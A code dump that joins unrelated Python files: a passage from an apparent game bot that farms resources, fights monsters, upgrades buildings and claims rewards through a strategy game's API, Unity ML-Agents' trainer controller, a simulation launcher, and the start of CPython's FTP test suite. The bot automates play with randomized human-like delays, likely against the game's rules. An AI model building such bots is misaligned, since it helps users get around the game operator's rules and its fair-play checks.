limit -= len(each_level)
return lands
def _get_zone_id_by_land_id(self, land_id):
land_array = blockshaped(self._get_land_array(), 4, 4)
return ndindex(land_array, land_id)[0]
def _update_march_limit(self):
troops = self.api.kingdom_profile_troops().get('troops')
self.troop_queue = troops.get('field')
self.march_limit = troops.get('info').get('marchLimit')
def _is_march_limit_exceeded(self):
if len(self.troop_queue) >= self.march_limit:
return True
return False
@staticmethod
def _calc_distance(from_loc, to_loc):
return math.ceil(math.sqrt(math.pow(from_loc[1] - to_loc[1], 2) + math.pow(from_loc[2] - to_loc[2], 2)))
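    # A minimal illustration (assuming loc values of the form [world, x, y]):
    #     LokFarmer._calc_distance([0, 10, 10], [0, 13, 14]) == 5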
def _start_march(self, to_loc, march_troops, march_type=MARCH_TYPE_GATHER):
res = self.api.field_march_start({
'fromId': self.kingdom_enter.get('kingdom').get('fieldObjectId'),
'marchType': march_type,
'toLoc': to_loc,
'marchTroops': march_troops
})
new_task = res.get('newTask')
new_task['endTime'] = new_task['expectedEnded']
self.troop_queue.append(new_task)
def _prepare_march_troops(self, each_obj, march_type=MARCH_TYPE_GATHER):
march_info = self.api.field_march_info({
'fromId': self.kingdom_enter.get('kingdom').get('fieldObjectId'),
'toLoc': each_obj.get('loc')
})
if march_type == MARCH_TYPE_MONSTER:
# check if monster is already dead
if march_info.get('fo').get('code') != each_obj.get('code'):
return []
troops = march_info.get('troops')
troops.sort(key=lambda x: x.get('code'), reverse=True) # priority using high tier troops
# todo: calc troops load
need_troop_count = march_info.get('fo').get('param').get('value')
if march_type == MARCH_TYPE_MONSTER:
need_troop_count *= 2.5
troop_count = sum([each_troop.get('amount') for each_troop in troops])
if need_troop_count > troop_count:
return []
# distance = self._calc_distance(from_loc, to_loc)
distance = march_info.get('distance')
logger.info(f'distance: {distance}, object: {each_obj}')
march_troops = []
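        # fill the march from the highest-tier troops first until the required amount is covered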
for troop in troops:
amount = troop.get('amount')
code = troop.get('code')
if amount >= need_troop_count:
amount = need_troop_count
need_troop_count = 0
else:
need_troop_count -= amount
march_troops.append({
'code': code,
'amount': amount,
'level': 0,
'select': 0,
'dead': 0,
'wounded': 0,
'seq': 0
})
return march_troops
def _on_field_objects_gather(self, each_obj):
if each_obj.get('occupied'):
return
to_loc = each_obj.get('loc')
march_troops = self._prepare_march_troops(each_obj, MARCH_TYPE_GATHER)
if not march_troops:
return
self._start_march(to_loc, march_troops, MARCH_TYPE_GATHER)
def _on_field_objects_monster(self, each_obj):
to_loc = each_obj.get('loc')
march_troops = self._prepare_march_troops(each_obj, MARCH_TYPE_MONSTER)
if not march_troops:
return
self._start_march(to_loc, march_troops, MARCH_TYPE_MONSTER)
@tenacity.retry(
stop=tenacity.stop_after_attempt(4),
wait=tenacity.wait_random_exponential(multiplier=1, max=60),
reraise=True
)
def sock_thread(self):
"""
websocket connection of the kingdom
:return:
"""
url = self.kingdom_enter.get('networks').get('kingdoms')[0]
sio = socketio.Client(reconnection=False, logger=builtin_logger, engineio_logger=builtin_logger)
@sio.on('/building/update')
def on_building_update(data):
logger.info(f'on_building_update: {data}')
self._update_kingdom_enter_building(data)
@sio.on('/resource/upgrade')
def on_resource_update(data):
logger.info(f'on_resource_update: {data}')
self.resources[data.get('resourceIdx')] = data.get('value')
@sio.on('/buff/list')
def on_buff_list(data):
logger.info(f'on_buff_list: {data}')
self.has_additional_building_queue = len([
item for item in data if item.get('param', {}).get('itemCode') == ITEM_CODE_GOLDEN_HAMMER
]) > 0
item_list = self.api.item_list().get('items')
for buff_type, item_code_list in USABLE_BOOST_CODE_MAP.items():
already_activated = [item for item in data if item.get('param', {}).get('itemCode') in item_code_list]
if already_activated:
continue
item_in_inventory = [item for item in item_list if item.get('code') in item_code_list]
if not item_in_inventory:
continue
if not self.buff_item_use_lock.acquire(blocking=False):
return
code = item_in_inventory[0].get('code')
logger.info(f'activating buff: {buff_type}, code: {code}')
self.api.item_use(code)
if code == ITEM_CODE_GOLDEN_HAMMER:
self.has_additional_building_queue = True
self.buff_item_use_lock.release()
sio.connect(url, transports=["websocket"])
sio.emit('/kingdom/enter', {'token': self.access_token})
sio.wait()
@tenacity.retry(
stop=tenacity.stop_after_attempt(4),
wait=tenacity.wait_random_exponential(multiplier=1, max=60),
reraise=True
)
def socf_thread(self):
"""
websocket connection of the field
:return:
"""
world = self.kingdom_enter.get('kingdom').get('worldId')
url = self.kingdom_enter.get('networks').get('fields')[0]
from_loc = self.kingdom_enter.get('kingdom').get('loc')
lands = self._get_nearest_land(from_loc[1], from_loc[2])
# lands = self._get_top_leveled_land()
zones = []
for land_id, _ in lands:
zone_id = self._get_zone_id_by_land_id(land_id)
if zone_id not in zones:
zones.append(zone_id)
sio = socketio.Client(reconnection=False, logger=builtin_logger, engineio_logger=builtin_logger)
@sio.on('/field/objects')
def on_field_objects(data):
objects = data.get('objects')
for each_obj in objects:
if self._is_march_limit_exceeded():
continue
if not self.march_start_lock.acquire(blocking=False):
return
code = each_obj.get('code')
try:
if code in (
OBJECT_CODE_CRYSTAL_MINE,
):
self._on_field_objects_gather(each_obj)
if code in (
OBJECT_CODE_GOBLIN,
OBJECT_CODE_GOLEM,
OBJECT_CODE_SKELETON,
OBJECT_CODE_ORC
):
self._on_field_objects_monster(each_obj)
except OtherException as error_code:
if str(error_code) in ('full_task', 'not_enough_troop'):
logger.warning(f'on_field_objects: {error_code}, skip')
return
raise
sio.connect(url, transports=["websocket"])
sio.emit('/field/enter', {'token': self.access_token})
while self._is_march_limit_exceeded():
nearest_end_time = sorted(self.troop_queue, key=lambda x: x.get('endTime'))[0].get('endTime')
seconds = self.calc_time_diff_in_seconds(nearest_end_time)
logger.info(f'_is_march_limit_exceeded: wait {seconds} seconds')
time.sleep(seconds)
self._update_march_limit()
for zone_id in zones:
if not sio.connected:
logger.warning('socf_thread disconnected, reconnecting')
raise tenacity.TryAgain()
sio.emit('/zone/enter/list', {'world': world, 'zones': json.dumps([zone_id])})
time.sleep(random.uniform(1, 2))
sio.emit('/zone/leave/list', {'world': world, 'zones': json.dumps([zone_id])})
logger.info('a loop is finished')
sio.disconnect()
sio.wait()
@tenacity.retry(
stop=tenacity.stop_after_attempt(4),
wait=tenacity.wait_random_exponential(multiplier=1, max=60),
reraise=True
)
def socc_thread(self):
url = self.kingdom_enter.get('networks').get('chats')[0]
sio = socketio.Client(reconnection=False, logger=builtin_logger, engineio_logger=builtin_logger)
sio.connect(url, transports=["websocket"])
sio.emit('/chat/enter', {'token': self.access_token})
# do nothing
sio.wait()
def harvester(self):
"""
        Harvest resources.
:return:
"""
buildings = self.kingdom_enter.get('kingdom', {}).get('buildings', [])
random.shuffle(buildings)
harvested_code = set()
for building in buildings:
code = building.get('code')
position = building.get('position')
if code not in HARVESTABLE_CODE:
continue
            # each type only needs to be harvested once; doing so collects every resource of that type automatically
if code in harvested_code:
continue
harvested_code.add(code)
self.api.kingdom_resource_harvest(position)
def quest_monitor_thread(self):
"""
        Quest monitoring.
:return:
"""
quest_list = self.api.quest_list()
# main quest(currently only one)
[self.api.quest_claim(q) for q in quest_list.get('mainQuests') if q.get('status') == STATUS_FINISHED]
# side quest(max 5)
if len([self.api.quest_claim(q) for q in quest_list.get('sideQuests') if
q.get('status') == STATUS_FINISHED]) >= 5:
            # if all five are already finished, fetch the next page
threading.Thread(target=self.quest_monitor_thread).start()
return
quest_list_daily = self.api.quest_list_daily().get('dailyQuest')
# daily quest(max 5)
if len([self.api.quest_claim_daily(q) for q in quest_list_daily.get('quests') if
q.get('status') == STATUS_FINISHED]) >= 5:
            # if all five are already finished, fetch the next page
threading.Thread(target=self.quest_monitor_thread).start()
return
# daily quest reward
[self.api.quest_claim_daily_level(q) for q in quest_list_daily.get('rewards') if
q.get('status') == STATUS_FINISHED]
# event
event_list = self.api.event_list()
event_has_red_dot = [each for each in event_list.get('events') if each.get('reddot') > 0]
for event in event_has_red_dot:
event_info = self.api.event_info(event.get('_id'))
finished_code = [
each.get('code') for each in event_info.get('eventKingdom').get('events')
if each.get('status') == STATUS_FINISHED
]
if not finished_code:
continue
[self.api.event_claim(
event_info.get('event').get('_id'), each.get('_id'), each.get('code')
) for each in event_info.get('event').get('events') if each.get('code') in finished_code]
logger.info('quest_monitor: done, sleep for 1h')
threading.Timer(3600, self.quest_monitor_thread).start()
return
def building_farmer_thread(self, task_code=TASK_CODE_SILVER_HAMMER):
"""
building farmer
:param task_code:
:return:
"""
if task_code == TASK_CODE_GOLD_HAMMER and not self.has_additional_building_queue:
return
current_tasks = self.api.kingdom_task_all().get('kingdomTasks', [])
worker_used = [t for t in current_tasks if t.get('code') == task_code]
if worker_used:
threading.Timer(
self.calc_time_diff_in_seconds(worker_used[0].get('expectedEnded')),
self.building_farmer_thread,
[task_code]
).start()
return
buildings = self.kingdom_enter.get('kingdom', {}).get('buildings', [])
kingdom_level = [b for b in buildings if b.get('code') == BUILDING_CODE_MAP['castle']][0].get('level')
# First check if there is any empty position available for building
for level_requirement, positions in BUILD_POSITION_UNLOCK_MAP.items():
if kingdom_level < level_requirement:
continue
for position in positions:
if position.get('position') in [building.get('position') for building in buildings]:
continue
building = {
'code': position.get('code'),
'position': position.get('position'),
'level': 0,
'state': BUILDING_STATE_NORMAL,
}
res = self._upgrade_building(building, buildings, task_code)
if res == 'continue':
continue
if res == 'break':
break
return
# Then check if there is any upgradeable building
for building in buildings:
res = self._upgrade_building(building, buildings, task_code)
if res == 'continue':
continue
if res == 'break':
break
return
logger.info('building_farmer: no building to upgrade, sleep for 2h')
threading.Timer(2 * 3600, self.building_farmer_thread, [task_code]).start()
return
def academy_farmer_thread(self, to_max_level=False):
"""
research farmer
:param to_max_level:
:return:
"""
current_tasks = self.api.kingdom_task_all().get('kingdomTasks', [])
worker_used = [t for t in current_tasks if t.get('code') == TASK_CODE_ACADEMY]
if worker_used:
if worker_used[0].get('status') != STATUS_CLAIMED:
threading.Timer(
self.calc_time_diff_in_seconds(worker_used[0].get('expectedEnded')),
self.academy_farmer_thread,
[to_max_level]
).start()
return
            # if the task is already finished, claim the reward and continue
self.api.kingdom_task_claim(BUILDING_POSITION_MAP['academy'])
exist_researches = self.api.kingdom_academy_research_list().get('researches', [])
buildings = self.kingdom_enter.get('kingdom', {}).get('buildings', [])
academy_level = [b for b in buildings if b.get('code') == BUILDING_CODE_MAP['academy']][0].get('level')
for category_name, each_category in RESEARCH_CODE_MAP.items():
logger.info(f'start researching category: {category_name}')
for research_name, research_code in each_category.items():
if not self._is_researchable(
academy_level, category_name, research_name, exist_researches, to_max_level
):
continue
try:
res = self.api.kingdom_academy_research({'code': research_code})
except OtherException as error_code:
if str(error_code) == 'not_enough_condition':
logger.warning(f'category {category_name} reached max level')
break
logger.info(f'research failed, try next one, current: {research_name}({research_code})')
continue
threading.Timer(
self.calc_time_diff_in_seconds(res.get('newTask').get('expectedEnded')),
self.academy_farmer_thread,
[to_max_level]
).start()
return
logger.info('academy_farmer: no research to do, sleep for 2h')
threading.Timer(2 * 3600, self.academy_farmer_thread, [to_max_level]).start()
return
def free_chest_farmer_thread(self, _type=0):
"""
        Claim the free chest.
:return:
"""
try:
res = self.api.item_free_chest(_type)
except OtherException as error_code:
if str(error_code) == 'free_chest_not_yet':
logger.info('free_chest_farmer: free_chest_not_yet, sleep for 2h')
threading.Timer(2 * 3600, self.free_chest_farmer_thread).start()
return
raise
next_gold = arrow.get(res.get('freeChest', {}).get('gold', {}).get('next'))
next_silver = arrow.get(res.get('freeChest', {}).get('silver', {}).get('next'))
if next_gold < next_silver:
threading.Timer(self.calc_time_diff_in_seconds(next_gold), self.free_chest_farmer_thread, [1]).start()
else:
threading.Timer(self.calc_time_diff_in_seconds(next_silver), self.free_chest_farmer_thread, [0]).start()
def use_resource_in_item_list(self):
"""
:return:
"""
item_list = self.api.item_list().get('items', [])
if not item_list:
return
usable_item_list = filter(lambda x: x.get('code') in USABLE_ITEM_CODE_LIST, item_list)
for each_item in usable_item_list:
self.api.item_use(each_item.get('code'), each_item.get('amount'))
time.sleep(random.randint(1, 3))
def vip_chest_claim(self):
"""
        Claim the VIP chest (claimable daily).
:return:
"""
vip_info = self.api.kingdom_vip_info()
if vip_info.get('vip', {}).get('isClaimed'):
return
self.api.kingdom_vip_claim()
def alliance_farmer(self):
if not self.kingdom_enter.get('kingdom', {}).get('allianceId'):
return
self._alliance_help_all()
self._alliance_research_donate_all()
self._alliance_shop_autobuy()
def caravan_farmer(self):
caravan = self.api.kingdom_caravan_list().get('caravan')
if not caravan:
return
for each_item in caravan.get('items', []):
if each_item.get('amount') < 1:
continue
if each_item.get('code') not in BUYABLE_CARAVAN_ITEM_CODE_LIST:
continue
if each_item.get('costItemCode') not in BUYABLE_CARAVAN_ITEM_CODE_LIST:
continue
resource_index = get_resource_index_by_item_code(each_item.get('costItemCode'))
if resource_index == -1:
continue
if each_item.get('cost') > self.resources[resource_index]:
continue
self.api.kingdom_caravan_buy(each_item.get('_id'))
def mail_claim(self):
self.api.mail_claim_all()
def wall_repair(self):
wall_info = self.api.kingdom_wall_info()
max_durability = wall_info.get('wall', {}).get('maxDurability')
durability = wall_info.get('wall', {}).get('durability')
last_repair_date = wall_info.get('wall', {}).get('lastRepairDate')
if not last_repair_date:
return
last_repair_date = arrow.get(last_repair_date)
last_repair_diff = arrow.utcnow() - last_repair_date
if durability >= max_durability:
return
if int(last_repair_diff.total_seconds()) < 60 * 30:
# 30 minute interval
return
self.api.kingdom_wall_repair()
def hospital_recover(self):
try:
self.api.kingdom_hospital_recover()
except OtherException:
pass
def keepalive_request(self):
run_functions_in_random_order(
self.api.kingdom_wall_info,
self.api.quest_main,
self.api.item_list,
self.api.kingdom_treasure_list,
self.api.event_list,
self.api.event_cvc_open,
self.api.event_roulette_open,
self.api.pkg_recommend,
self.api.pkg_list,
)
|
trainer_controller.py
|
# # Unity ML-Agents Toolkit
# ## ML-Agent Learning
"""Launches trainers for each External Brains in a Unity Environment."""
import os
import sys
import threading
from typing import Dict, Optional, Set, List
from collections import defaultdict
import numpy as np
from mlagents.tf_utils import tf
from mlagents_envs.logging_util import get_logger
from mlagents.trainers.env_manager import EnvManager
from mlagents_envs.exception import (
UnityEnvironmentException,
UnityCommunicationException,
)
from mlagents.trainers.sampler_class import SamplerManager
from mlagents_envs.timers import hierarchical_timer, timed
from mlagents.trainers.trainer import Trainer
from mlagents.trainers.meta_curriculum import MetaCurriculum
from mlagents.trainers.trainer_util import TrainerFactory
from mlagents.trainers.behavior_id_utils import BehaviorIdentifiers
from mlagents.trainers.agent_processor import AgentManager
class TrainerController(object):
def __init__(
self,
trainer_factory: TrainerFactory,
output_path: str,
run_id: str,
save_freq: int,
meta_curriculum: Optional[MetaCurriculum],
train: bool,
training_seed: int,
sampler_manager: SamplerManager,
resampling_interval: Optional[int],
):
"""
        :param trainer_factory: Factory used to create a trainer for each behavior.
        :param output_path: Path to save the model.
:param run_id: The sub-directory name for model and summary statistics
:param save_freq: Frequency at which to save model
:param meta_curriculum: MetaCurriculum object which stores information about all curricula.
:param train: Whether to train model, or only run inference.
:param training_seed: Seed to use for Numpy and Tensorflow random number generation.
:param sampler_manager: SamplerManager object handles samplers for resampling the reset parameters.
:param resampling_interval: Specifies number of simulation steps after which reset parameters are resampled.
"""
self.trainers: Dict[str, Trainer] = {}
self.brain_name_to_identifier: Dict[str, Set] = defaultdict(set)
self.trainer_factory = trainer_factory
self.output_path = output_path
self.logger = get_logger(__name__)
self.run_id = run_id
self.save_freq = save_freq
self.train_model = train
self.meta_curriculum = meta_curriculum
self.sampler_manager = sampler_manager
self.resampling_interval = resampling_interval
self.ghost_controller = self.trainer_factory.ghost_controller
self.trainer_threads: List[threading.Thread] = []
self.kill_trainers = False
np.random.seed(training_seed)
tf.set_random_seed(training_seed)
def _get_measure_vals(self):
brain_names_to_measure_vals = {}
if self.meta_curriculum:
for (
brain_name,
curriculum,
) in self.meta_curriculum.brains_to_curricula.items():
# Skip brains that are in the metacurriculum but no trainer yet.
if brain_name not in self.trainers:
continue
if curriculum.measure == "progress":
measure_val = self.trainers[brain_name].get_step / float(
self.trainers[brain_name].get_max_steps
)
brain_names_to_measure_vals[brain_name] = measure_val
elif curriculum.measure == "reward":
measure_val = np.mean(self.trainers[brain_name].reward_buffer)
brain_names_to_measure_vals[brain_name] = measure_val
else:
for brain_name, trainer in self.trainers.items():
measure_val = np.mean(trainer.reward_buffer)
brain_names_to_measure_vals[brain_name] = measure_val
return brain_names_to_measure_vals
@timed
def _save_model(self):
"""
Saves current model to checkpoint folder.
"""
for brain_name in self.trainers.keys():
for name_behavior_id in self.brain_name_to_identifier[brain_name]:
self.trainers[brain_name].save_model(name_behavior_id)
self.logger.info("Saved Model")
def _save_model_when_interrupted(self):
self.logger.info(
"Learning was interrupted. Please wait while the graph is generated."
)
self._save_model()
def _export_graph(self):
"""
Exports latest saved models to .nn format for Unity embedding.
"""
for brain_name in self.trainers.keys():
for name_behavior_id in self.brain_name_to_identifier[brain_name]:
self.trainers[brain_name].export_model(name_behavior_id)
@staticmethod
def _create_output_path(output_path):
try:
if not os.path.exists(output_path):
os.makedirs(output_path)
except Exception:
raise UnityEnvironmentException(
f"The folder {output_path} containing the "
"generated model could not be "
"accessed. Please make sure the "
"permissions are set correctly."
)
@timed
def _reset_env(self, env: EnvManager) -> None:
"""Resets the environment.
Returns:
A Data structure corresponding to the initial reset state of the
environment.
"""
sampled_reset_param = self.sampler_manager.sample_all()
new_meta_curriculum_config = (
self.meta_curriculum.get_config() if self.meta_curriculum else {}
)
sampled_reset_param.update(new_meta_curriculum_config)
env.reset(config=sampled_reset_param)
def _should_save_model(self, global_step: int) -> bool:
return (
global_step % self.save_freq == 0 and global_step != 0 and self.train_model
)
def _not_done_training(self) -> bool:
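        # Keep looping while any trainer still wants to train, while running inference only,
        # or before any trainer has been created.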
return (
any(t.should_still_train for t in self.trainers.values())
or not self.train_model
) or len(self.trainers) == 0
def _create_trainer_and_manager(
self, env_manager: EnvManager, name_behavior_id: str
) -> None:
parsed_behavior_id = BehaviorIdentifiers.from_name_behavior_id(name_behavior_id)
brain_name = parsed_behavior_id.brain_name
trainerthread = None
try:
trainer = self.trainers[brain_name]
except KeyError:
trainer = self.trainer_factory.generate(brain_name)
self.trainers[brain_name] = trainer
if trainer.threaded:
# Only create trainer thread for new trainers
trainerthread = threading.Thread(
target=self.trainer_update_func, args=(trainer,), daemon=True
)
self.trainer_threads.append(trainerthread)
policy = trainer.create_policy(
parsed_behavior_id, env_manager.external_brains[name_behavior_id]
)
trainer.add_policy(parsed_behavior_id, policy)
agent_manager = AgentManager(
policy,
name_behavior_id,
trainer.stats_reporter,
trainer.parameters.get("time_horizon", sys.maxsize),
threaded=trainer.threaded,
)
env_manager.set_agent_manager(name_behavior_id, agent_manager)
env_manager.set_policy(name_behavior_id, policy)
self.brain_name_to_identifier[brain_name].add(name_behavior_id)
trainer.publish_policy_queue(agent_manager.policy_queue)
trainer.subscribe_trajectory_queue(agent_manager.trajectory_queue)
# Only start new trainers
if trainerthread is not None:
trainerthread.start()
def _create_trainers_and_managers(
self, env_manager: EnvManager, behavior_ids: Set[str]
) -> None:
for behavior_id in behavior_ids:
self._create_trainer_and_manager(env_manager, behavior_id)
@timed
def start_learning(self, env_manager: EnvManager) -> None:
self._create_output_path(self.output_path)
tf.reset_default_graph()
global_step = 0
last_brain_behavior_ids: Set[str] = set()
try:
# Initial reset
self._reset_env(env_manager)
while self._not_done_training():
external_brain_behavior_ids = set(env_manager.external_brains.keys())
new_behavior_ids = external_brain_behavior_ids - last_brain_behavior_ids
self._create_trainers_and_managers(env_manager, new_behavior_ids)
last_brain_behavior_ids = external_brain_behavior_ids
n_steps = self.advance(env_manager)
for _ in range(n_steps):
global_step += 1
self.reset_env_if_ready(env_manager, global_step)
if self._should_save_model(global_step):
self._save_model()
# Stop advancing trainers
self.kill_trainers = True
# Final save Tensorflow model
if global_step != 0 and self.train_model:
self._save_model()
except (
KeyboardInterrupt,
UnityCommunicationException,
UnityEnvironmentException,
) as ex:
self.kill_trainers = True
if self.train_model:
self._save_model_when_interrupted()
if isinstance(ex, KeyboardInterrupt):
pass
else:
# If the environment failed, we want to make sure to raise
                    # the exception so we exit the process with a return code of 1.
raise ex
if self.train_model:
self._export_graph()
def end_trainer_episodes(
self, env: EnvManager, lessons_incremented: Dict[str, bool]
) -> None:
self._reset_env(env)
# Reward buffers reset takes place only for curriculum learning
# else no reset.
for trainer in self.trainers.values():
trainer.end_episode()
for brain_name, changed in lessons_incremented.items():
if changed:
self.trainers[brain_name].reward_buffer.clear()
def reset_env_if_ready(self, env: EnvManager, steps: int) -> None:
if self.meta_curriculum:
# Get the sizes of the reward buffers.
reward_buff_sizes = {
k: len(t.reward_buffer) for (k, t) in self.trainers.items()
}
# Attempt to increment the lessons of the brains who
# were ready.
lessons_incremented = self.meta_curriculum.increment_lessons(
self._get_measure_vals(), reward_buff_sizes=reward_buff_sizes
)
else:
lessons_incremented = {}
# If any lessons were incremented or the environment is
# ready to be reset
meta_curriculum_reset = any(lessons_incremented.values())
# Check if we are performing generalization training and we have finished the
# specified number of steps for the lesson
generalization_reset = (
not self.sampler_manager.is_empty()
and (steps != 0)
and (self.resampling_interval)
and (steps % self.resampling_interval == 0)
)
ghost_controller_reset = self.ghost_controller.should_reset()
if meta_curriculum_reset or generalization_reset or ghost_controller_reset:
self.end_trainer_episodes(env, lessons_incremented)
@timed
def advance(self, env: EnvManager) -> int:
# Get steps
with hierarchical_timer("env_step"):
num_steps = env.advance()
# Report current lesson
if self.meta_curriculum:
for brain_name, curr in self.meta_curriculum.brains_to_curricula.items():
if brain_name in self.trainers:
self.trainers[brain_name].stats_reporter.set_stat(
"Environment/Lesson", curr.lesson_num
)
for trainer in self.trainers.values():
if not trainer.threaded:
with hierarchical_timer("trainer_advance"):
trainer.advance()
return num_steps
def trainer_update_func(self, trainer: Trainer) -> None:
while not self.kill_trainers:
with hierarchical_timer("trainer_advance"):
trainer.advance()
|
main.py
|
#!/usr/bin/env python3.6
"""
This file contains various wrappers and functions that make the code easier to digest and to work with in general.
.. module:: main
:platform: linux
.. moduleauthor:: Ivan Syzonenko <is2k@mtmail.mtsu.edu>
"""
__license__ = "MIT"
__docformat__ = 'reStructuredText'
import multiprocessing
import os
from GMDA_main import GMDA_main
from threaded_funcs import threaded_db_input, threaded_print # ,threaded_copy, threaded_rm
# from helper_funcs import get_previous_runs_info
def main():
"""This function is basically a launcher
Parallel threads did not result in a much better performance and was masked for better times.
However, if you decide to implement C++ parallel I/O - it should help.
"""
# Compilation steps:
# compile latest gcc
# compile gromacs with shared libs and static libs, without mpi; install
# compile mdsctk
# OPTIONAL: compile gromacs with mpi/openmp if needed.
tot_seeds = 4
# get_db_con(tot_seeds=4)
past_dir = os.path.join(os.getcwd(), 'past/')
#
# PRINT_LOCK = Lock()
# COPY_LOCK = Lock()
# RM_LOCK = Lock()
# print_queue = queue.Queue()
# printing_thread = Thread(target=threaded_print, args=(print_queue,))
# printing_thread.start()
# db_input_queue = queue.Queue()
# db_input_thread = Thread(target=threaded_db_input, args=(db_input_queue, tot_seeds,))
# db_input_thread.start()
# # db_input_queue.put(None)
#
# copy_queue = queue.Queue()
# copy_thread = Thread(target=threaded_copy, args=(copy_queue,))
# copy_thread.start()
#
# rm_queue = queue.Queue()
# rm_thread = Thread(target=threaded_rm, args=(rm_queue, RM_LOCK,))
# rm_thread.start()
# prev_runs_files = get_previous_runs_info(past_dir)
# print_queue = multiprocessing.JoinableQueue(102400)
# printing_thread = multiprocessing.Process(target=threaded_print, args=(print_queue,))
# printing_thread.start()
print_queue = None
db_input_queue = multiprocessing.JoinableQueue(102400)
db_input_thread = multiprocessing.Process(target=threaded_db_input, args=(db_input_queue, tot_seeds,))
db_input_thread.start()
# no need in the next queues. Maybe helpful if working with /dev/shm
# copy_queue = None
# copy_queue = multiprocessing.Queue()
# copy_thread = multiprocessing.Process(target=threaded_copy, args=(copy_queue,))
# copy_thread.start()
# rm_queue = None
# rm_queue = multiprocessing.JoinableQueue(3)
# rm_thread = multiprocessing.Process(target=threaded_rm, args=(rm_queue,))
# rm_thread.start()
GMDA_main(past_dir, print_queue, db_input_queue, tot_seeds)
# GMDA_main(prev_runs_files, past_dir, print_queue, db_input_queue, copy_queue, rm_queue, tot_seeds)
    # the printing thread is currently disabled (print_queue is None), so only signal the DB input thread
    if print_queue is not None:
        print_queue.put_nowait(None)
    db_input_queue.put_nowait(None)
    db_input_thread.join()
print('The last line of the program.')
# rm_queue.put_nowait(None)
# print_queue.join()
# db_input_queue.join()
# rm_queue.join()
if __name__ == "__main__":
main()
|
test_ftplib.py
|
"""Test script for ftplib module."""
# Modified by Giampaolo Rodola' to test FTP class and IPv6 environment
import ftplib
import threading
import asyncore
import asynchat
import socket
import StringIO
from unittest import TestCase
from test import test_support
from test.test_support import HOST
# the dummy data returned by server over the data channel when
# RETR, LIST and NLST commands are issued
RETR_DATA = 'abcde12345\r\n' * 1000
LIST_DATA = 'foo\r\nbar\r\n'
NLST_DATA = 'foo\r\nbar\r\n'
class DummyDTPHandler(asynchat.async_chat):
def __init__(self, conn, baseclass):
asynchat.async_chat.__init__(self, conn)
self.baseclass = baseclass
self.baseclass.last_received_data = ''
def handle_read(self):
self.baseclass.last_received_data += self.recv(1024)
def handle_close(self):
self.baseclass.push('226 transfer complete')
self.close()
class DummyFTPHandler(asynchat.async_chat):
def __init__(self, conn):
asynchat.async_chat.__init__(self, conn)
self.set_terminator("\r\n")
self.in_buffer = []
self.dtp = None
self.last_received_cmd = None
self.last_received_data = ''
self.next_response = ''
self.push('220 welcome')
def collect_incoming_data(self, data):
self.in_buffer.append(data)
def found_terminator(self):
line = ''.join(self.in_buffer)
self.in_buffer = []
if self.next_response:
self.push(self.next_response)
self.next_response = ''
cmd = line.split(' ')[0].lower()
self.last_received_cmd = cmd
space = line.find(' ')
if space != -1:
arg = line[space + 1:]
else:
arg = ""
if hasattr(self, 'cmd_' + cmd):
method = getattr(self, 'cmd_' + cmd)
method(arg)
else:
self.push('550 command "%s" not understood.' %cmd)
def handle_error(self):
raise
def push(self, data):
asynchat.async_chat.push(self, data + '\r\n')
def cmd_port(self, arg):
addr = map(int, arg.split(','))
ip = '%d.%d.%d.%d' %tuple(addr[:4])
port = (addr[4] * 256) + addr[5]
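        # e.g. "PORT 127,0,0,1,4,1" decodes to 127.0.0.1:1025 (4 * 256 + 1)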
s = socket.create_connection((ip, port), timeout=2)
self.dtp = DummyDTPHandler(s, baseclass=self)
self.push('200 active data connection established')
def cmd_pasv(self, arg):
sock = socket.socket()
sock.bind((self.socket.getsockname()[0], 0))
sock.listen(5)
sock.settimeout(2)
ip, port = sock.getsockname()[:2]
ip = ip.replace('.', ','); p1 = port / 256; p2 = port % 256
self.push('227 entering passive mode (%s,%d,%d)' %(ip, p1, p2))
conn, addr = sock.accept()
self.dtp = DummyDTPHandler(conn, baseclass=self)
def cmd_eprt(self, arg):
af, ip, port = arg.split(arg[0])[1:-1]
port = int(port)
s = socket.create_connection((ip, port), timeout=2)
self.dtp = DummyDTPHandler(s, baseclass=self)
self.push('200 active data connection established')
def cmd_epsv(self, arg):
sock = socket.socket(socket.AF_INET6)
sock.bind((self.socket.getsockname()[0], 0))
sock.listen(5)
sock.settimeout(2)
port = sock.getsockname()[1]
self.push('229 entering extended passive mode (|||%d|)' %port)
conn, addr = sock.accept()
self.dtp = DummyDTPHandler(conn, baseclass=self)
def cmd_echo(self, arg):
# sends back the received string (used by the test suite)
self.push(arg)
def cmd_user(self, arg):
self.push('331 username ok')
def cmd_pass(self, arg):
self.push('230 password ok')
def cmd_acct(self, arg):
self.push('230 acct ok')
def cmd_rnfr(self, arg):
self.push('350 rnfr ok')
def cmd_rnto(self, arg):
self.push('250 rnto ok')
def cmd_dele(self, arg):
self.push('250 dele ok')
def cmd_cwd(self, arg):
self.push('250 cwd ok')
def cmd_size(self, arg):
self.push('250 1000')
def cmd_mkd(self, arg):
self.push('257 "%s"' %arg)
def cmd_rmd(self, arg):
self.push('250 rmd ok')
def cmd_pwd(self, arg):
self.push('257 "pwd ok"')
def cmd_type(self, arg):
self.push('200 type ok')
def cmd_quit(self, arg):
self.push('221 quit ok')
self.close()
def cmd_stor(self, arg):
self.push('125 stor ok')
def cmd_retr(self, arg):
self.push('125 retr ok')
self.dtp.push(RETR_DATA)
self.dtp.close_when_done()
def cmd_list(self, arg):
self.push('125 list ok')
self.dtp.push(LIST_DATA)
self.dtp.close_when_done()
def cmd_nlst(self, arg):
self.push('125 nlst ok')
self.dtp.push(NLST_DATA)
self.dtp.close_when_done()
class DummyFTPServer(asyncore.dispatcher, threading.Thread):
handler = DummyFTPHandler
def __init__(self, address, af=socket.AF_INET):
threading.Thread.__init__(self)
asyncore.dispatcher.__init__(self)
self.create_socket(af, socket.SOCK_STREAM)
self.bind(address)
self.listen(5)
self.active = False
self.active_lock = threading.Lock()
self.host, self.port = self.socket.getsockname()[:2]
def start(self):
assert not self.active
self.__flag = threading.Event()
threading.Thread.start(self)
self.__flag.wait()
def run(self):
self.active = True
self.__flag.set()
while self.active and asyncore.socket_map:
self.active_lock.acquire()
asyncore.loop(timeout=0.1, count=1)
self.active_lock.release()
asyncore.close_all(ignore_all=True)
def stop(self):
assert self.active
self.active = False
self.join()
def handle_accept(self):
conn, addr = self.accept()
self.handler = self.handler(conn)
self.close()
def handle_connect(self):
self.close()
handle_read = handle_connect
def writable(self):
return 0
def handle_error(self):
raise
class TestFTPClass(TestCase):
def setUp(self):
self.server = DummyFTPServer((HOST, 0))
self.server.start()
self.client = ftplib.FTP(timeout=2)
self.client.connect(self.server.host, self.server.port)
def tearDown(self):
self.client.close()
self.server.stop()
def test_getwelcome(self):
